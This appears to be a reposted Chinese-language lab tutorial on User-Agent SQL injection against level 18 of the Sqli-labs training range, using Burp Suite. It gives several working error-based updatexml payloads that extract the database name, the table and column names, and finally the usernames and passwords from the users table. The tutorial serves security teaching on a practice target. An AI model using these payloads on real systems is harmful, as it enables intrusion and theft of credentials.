靶场教学 | SQL注入——UserAgent注入

admin 2022年7月4日19:35:20评论34 views字数 951阅读3分10秒阅读模式

01

预备知识



SQL注入

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。


UserAgent

User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。


02

漏洞复现



火狐浏览器

BurpSuite

Sqli-labs靶场


03

复现步骤



1、启动Sqli-labs靶场,进入Less-18关卡

https://github.com/Audi-1/sqli-labs

靶场教学 | SQL注入——UserAgent注入

2、查看网页,显示的是访问者的useragent信息,所以可以通过useragent语句进行注入。

3、开启burpsuite软件,进行抓包。
4、修改数据包中的User-Agent字段,在后面添加payload
123' or updatexml(1,concat(0x7e,(database())),0) or '


靶场教学 | SQL注入——UserAgent注入

得到当前的名称是security。

靶场教学 | SQL注入——UserAgent注入
5、修改payload为:
123' or updatexml(0,concat(0x7e,(select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security')),0) or '

靶场教学 | SQL注入——UserAgent注入
得到所有的表是emails,referers,uagents,users。
靶场教学 | SQL注入——UserAgent注入
6、获取表中的字段
123' or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0) or '


靶场教学 | SQL注入——UserAgent注入


靶场教学 | SQL注入——UserAgent注入

7、获取表中的数据

123' or updatexml(0,concat(0x7e,(select group_concat(id,username,password) from security.users )),0) or '

靶场教学 | SQL注入——UserAgent注入


靶场教学 | SQL注入——UserAgent注入



靶场教学 | SQL注入——UserAgent注入

扫码关注我们

查看更多精彩内容




原文始发于微信公众号(长风实验室):靶场教学 | SQL注入——UserAgent注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月4日19:35:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场教学 | SQL注入——UserAgent注入https://cn-sec.com/archives/1156770.html

发表评论

匿名网友 填写信息